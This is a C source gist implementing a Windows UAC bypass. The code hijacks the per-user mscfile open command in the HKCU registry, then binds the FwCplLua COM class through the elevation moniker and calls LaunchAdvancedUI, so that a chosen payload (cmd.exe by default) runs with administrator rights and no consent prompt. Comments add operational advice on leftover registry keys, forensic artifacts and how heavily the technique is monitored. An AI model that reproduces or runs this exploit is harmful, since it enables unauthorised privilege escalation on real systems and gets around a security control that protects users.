Forked from hfiref0x/akagi_42b.c
Created August 28, 2018 03:25
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
// Forward declaration of the FwCplLua COM interface type (COM headers spell
// `struct` as `interface`), so the vtable below can name it in its method
// signatures before the struct itself is defined.
typedef interface IFwCplLua IFwCplLua;
/*
 * Hand-written vtable for the FwCplLua COM interface.
 *
 * Slot ORDER is the whole contract here: three IUnknown entries first,
 * then fifteen entries named Method1..Method15, then LaunchAdvancedUI as
 * the 19th and last entry. The placeholder names suggest the layout was
 * reconstructed rather than taken from a public IDL; Method1..Method15
 * are declared with a bare (This) signature only to occupy their slots,
 * their real names and parameters are not known from this file, and they
 * must never be called through this table. Method42b_Test below uses only
 * Release and LaunchAdvancedUI.
 */
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
// --- IUnknown (slots 1-3) ---
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IFwCplLua * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IFwCplLua * This);
// --- slots 4-18: placeholders, signatures unknown, do not call ---
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in IFwCplLua * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in IFwCplLua * This);
// --- slot 19: the only FwCplLua-specific method this code invokes ---
HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)(
__RPC__in IFwCplLua * This);
END_INTERFACE
} *PIFwCplLuaInterfaceVtbl;
// C-style COM object: the only field is the vtable pointer. Methods are
// invoked as obj->lpVtbl->Method(obj), passing the object as This.
interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};
// CLSID of the COM class that Method42b_Test binds through the
// "Elevation:Administrator!new:" moniker. NOTE(review): for the bypass to
// work without a consent prompt this class presumably carries auto-elevation
// approval in the registry; that cannot be confirmed from this file.
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
// IID handed to CoGetObject after parsing with IIDFromString.
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
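/*
 * Method42b_Test
 *
 * Hijack the per-user "mscfile" open handler, then drive the FwCplLua COM
 * class through the COM elevation moniker. Per the gist description the
 * elevated LaunchAdvancedUI call ends up resolving that handler, so the
 * hijacked command is started by an elevated process. The step that opens
 * an .msc file lives inside the COM server and is not visible here.
 *
 * Parameters
 *   lpszPayload - path of the program to register as the mscfile open
 *                 command. NULL keeps this test routine's historical
 *                 behaviour and registers C:\windows\system32\cmd.exe.
 *                 (Previously the parameter was accepted but ignored.)
 *
 * Return
 *   TRUE when IIDFromString, the registry write, CoGetObject and
 *   LaunchAdvancedUI all succeed; FALSE otherwise. TRUE only means the COM
 *   call returned success, not that the payload actually ran.
 *
 * Caveats the caller must know about
 *   - HKCU\Software\Classes\mscfile\shell\open\command is created and is
 *     NOT removed on return, not even when a later step fails. The caller
 *     must delete it once the payload has been picked up; until then every
 *     .msc opened by this user runs the payload, and the stray key is an
 *     obvious forensic artifact. It is not deleted inline because the
 *     elevated process may not have read it yet when LaunchAdvancedUI
 *     returns - verify the timing before adding cleanup here.
 *   - COM must already be initialised on the calling thread; nothing here
 *     calls CoInitialize.
 *   - Both the HKCU mscfile write and the "Elevation:Administrator!new:"
 *     moniker are widely monitored indicators; treat the technique as noisy.
 */
BOOL Method42b_Test(
    LPWSTR lpszPayload
)
{
    HRESULT r = E_FAIL;            /* remains E_FAIL on every early exit */
    LPWSTR lpBuffer = NULL;
    LRESULT lResult;
    HKEY hKey = NULL;
    SIZE_T sz = 0;
    IID xIIDFwCplLua;
    IFwCplLua *FwCplLua = NULL;
    BIND_OPTS3 bop;
    WCHAR szDefaultPayload[MAX_PATH + 1];
    WCHAR szElevationMoniker[MAX_PATH];

    do {

        if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK)
            break;

        /*
         * Pick the command to register. The caller's payload is used in
         * place (no copy, so its length is not constrained by a local
         * buffer); the cmd.exe default exists only for interactive testing.
         */
        if (lpszPayload != NULL) {
            lpBuffer = lpszPayload;
        }
        else {
            _strcpy(szDefaultPayload, L"C:\\windows\\system32\\cmd.exe");
            lpBuffer = szDefaultPayload;
        }

        sz = _strlen(lpBuffer);
        if (sz == 0)
            break;

        /*
         * Per-user class registration. NOTE(review): the technique relies on
         * HKCU\Software\Classes shadowing the machine-wide mscfile ProgID
         * for this user, which is why an unprivileged write is enough; the
         * key normally does not exist, hence create rather than open.
         */
        lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
            L"Software\\Classes\\mscfile\\shell\\open\\command",
            0,
            NULL,
            REG_OPTION_NON_VOLATILE,
            MAXIMUM_ALLOWED,
            NULL,
            &hKey,
            NULL);

        if (lResult != ERROR_SUCCESS)
            break;

        /* Default value holds the bare command; size includes the NUL. */
        sz = (1 + sz) * sizeof(WCHAR);
        lResult = RegSetValueEx(
            hKey,
            TEXT(""),
            0,
            REG_SZ,
            (BYTE*)lpBuffer,
            (DWORD)sz);

        if (lResult != ERROR_SUCCESS)
            break;

        RegCloseKey(hKey);
        hKey = NULL;

        /*
         * Bind to the class via the elevation moniker with an out-of-process
         * context, so the object is hosted by an elevated COM server.
         * Buffer is ample: 28-char prefix + 38-char CLSID << MAX_PATH.
         */
        _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
        _strcat(szElevationMoniker, T_CLSID_FwCplLua);

        RtlSecureZeroMemory(&bop, sizeof(bop));
        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;

        r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIIDFwCplLua, &FwCplLua);
        if (r != S_OK)
            break;

        if (FwCplLua == NULL) {
            r = E_FAIL;
            break;
        }

        /* Last vtable entry; the Method1..Method15 placeholders are never used. */
        r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);

    } while (FALSE);

    /* hKey is still open only if RegSetValueEx failed. */
    if (hKey != NULL)
        RegCloseKey(hKey);

    if (FwCplLua != NULL)
        FwCplLua->lpVtbl->Release(FwCplLua);

    return SUCCEEDED(r);
}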